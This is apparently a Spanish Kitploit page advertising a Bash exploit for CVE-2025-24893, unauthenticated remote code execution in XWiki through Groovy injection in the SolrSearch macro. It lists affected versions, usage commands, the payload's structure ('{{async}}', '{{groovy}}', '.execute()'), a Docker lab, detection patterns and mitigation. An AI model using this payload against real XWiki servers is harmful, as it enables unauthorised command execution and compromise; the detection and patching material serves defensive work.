¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!
XWiki-Platform-RCE-CVE-2025-24893 — Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema. | Kitploit
Exploit de Bash para CVE-2025-24893, RCE no autenticado en XWiki Platform, que utiliza inyección de plantillas en la macro SolrSearch para ejecutar comandos arbitrarios del sistema.
Este script es una implementación renovada en Bash de un exploit que apunta a las versiones de XWiki Platform afectadas por CVE-2025-24893. Aprovecha una vulnerabilidad crítica de ejecución remota de código no autenticado que permite a atacantes ejecutar código Groovy arbitrario mediante un fallo de inyección de plantillas en la macro SolrSearch.
Las implementaciones originales del exploit en Python fueron creadas por varios investigadores de seguridad y se adaptan aquí para usuarios de Bash con una ejecución simplificada y usabilidad mejorada.
Detalles de la vulnerabilidad
Descubridor: John Kwak (Trend Micro's Zero Day Initiative)
Descripción: La vulnerabilidad se origina en una desinfección incorrecta de las entradas en la macro SolrSearch dentro de XWiki Platform. La macro no valida ni desinfecta adecuadamente la entrada proporcionada por el usuario en el parámetro text cuando se accede a través del endpoint RSS de medios, lo que permite a los atacantes inyectar código Groovy malicioso en la cadena de renderizado sin autenticación.
Versiones afectadas y parcheadas
Versiones afectadas
XWiki Platform: 5.3-milestone-2 a 15.10.10
XWiki Platform: 16.0.0-rc-1 a 16.4.0
Versiones parcheadas
XWiki 15.10.11 o posterior
XWiki 16.4.1 o posterior
XWiki 16.5.0RC1 o posterior
Características
RCE no autenticado: Ejecuta comandos arbitrarios del sistema sin autenticación.
Omisión de token CSRF: Explota la inyección de plantillas sin necesidad de tokens CSRF.
Ejecución en segundo plano: Los comandos se ejecutan de forma asíncrona en el servidor objetivo.
Interfaz de línea de comandos simple: Script Bash fácil de usar con dependencias mínimas.
Requisitos previos
Dependencias:
curl: Para enviar solicitudes HTTP.
jq: Para la codificación URL del payload.
Shell Bash.
Entorno probado: SO Linux con Bash.
Uso
Otorga los permisos de ejecución:
root@kitploit:~
chmod +x CVE-2025-24893
Ejecuta el script con los argumentos requeridos:
root@kitploit:~
./CVE-2025-24893 <url_objetivo> <comando>
Parámetros
Parámetro
Descripción
<url_objetivo>
La URL de XWiki objetivo (ej., http://ejemplo.com o https://xwiki.ejemplo.org). El protocolo es opcional.
<comando>
El comando del sistema a ejecutar en el servidor objetivo.
Ejemplo
Verificar si el objetivo es vulnerable (ejecutar el comando id):
}}} - Cierra cualquier contexto de macro existente
{{async async=false}} - Asegura una ejecución síncrona
{{groovy}}...{{/groovy}} - Envuelve el código Groovy malicioso
'<comando>'.execute(); - Ejecuta el comando del sistema especificado
Prueba de concepto
Configuración del entorno vulnerable
Para fines de prueba, puedes configurar una instancia vulnerable de XWiki usando Docker:
root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10
Demostración de explotación
root@kitploit:~
# Espera a que XWiki se inicie (puede tardar 1-2 minutos)
./CVE-2025-24893 http://localhost:8080 "whoami"
Impacto
La explotación exitosa de esta vulnerabilidad permite a un atacante no autenticado:
Ejecutar comandos arbitrarios del sistema en el servidor
Leer, modificar o eliminar datos sensibles
Comprometer toda la instalación de XWiki
Moverse lateralmente a otros sistemas en la red
Implementar mineros de criptomonedas u otro malware
Establecer acceso persistente de puerta trasera
Explotación en el mundo real
Según CISA y múltiples proveedores de seguridad:
Explotación activa: CVE-2025-24893 se está explotando activamente en la naturaleza
Campañas de ataque: VulnCheck detectó cadenas de ataque de dos etapas que implementan mineros de criptomonedas
Catálogo KEV de CISA: Agregado al catálogo de Vulnerabilidades Explotadas Conocidas el 30 de octubre de 2025
Escaneo masivo: Escaneo masivo a nivel de Internet en busca de instancias vulnerables
Detección y mitigación
Detección
Monitorea solicitudes sospechosas al endpoint SolrSearch:
root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*
Busca patrones que contengan:
{{groovy}}
{{async}}
.execute()
Variaciones codificadas en URL de lo anterior
Indicadores de compromiso (IoCs)
Procesos inesperados generados por el usuario de la aplicación XWiki
Archivos nuevos en /tmp u otros directorios con permisos de escritura
Conexiones de red salientes a IPs desconocidas
Procesos de minería de criptomonedas (uso elevado de CPU)
Mitigación
Actualiza XWiki a una versión parcheada:
Versión 15.10.11 o posterior
Versión 16.4.1 o posterior
Versión 16.5.0RC1 o posterior
Aplica soluciones temporales (si no es posible parchear de inmediato):
Restringe el acceso al endpoint SolrSearch mediante un Firewall de Aplicaciones Web (WAF)
Deshabilita la macro SolrSearch si no es necesaria
Implementa segmentación de red para limitar la exposición
Monitorea en busca de compromiso:
Revisa los registros en busca de intentos de explotación
Verifica modificaciones no autorizadas de archivos
Escanea en busca de mineros de criptomonedas y puertas traseras
Limitaciones
Los comandos se ejecutan en segundo plano; la salida puede no ser visible de inmediato.
La verificación de la ejecución del comando requiere métodos de canal lateral (ej., creación de archivos, conexiones de red).
Requiere que el objetivo tenga la macro SolrSearch habilitada (configuración predeterminada).
Créditos
Descubridor de la vulnerabilidad: John Kwak (Trend Micro's Zero Day Initiative)
Autores originales del exploit en Python: Varios investigadores de seguridad
Script adaptado: Renovado por [0xdtc] Construido en BASH
Descargo de responsabilidad
Este script es únicamente con fines educativos. El uso no autorizado de esta herramienta contra sistemas que no posees o para los que no tienes permiso explícito de pruebas es ilegal y poco ético. Úsalo de manera responsable.
Debes tener permiso explícito por escrito del propietario del sistema antes de realizar pruebas.
El(los) autor(es) de esta herramienta no son responsables por el mal uso o daños causados por este script. Los usuarios son los únicos responsables de asegurarse de tener la autorización adecuada y cumplir con todas las leyes y regulaciones aplicables.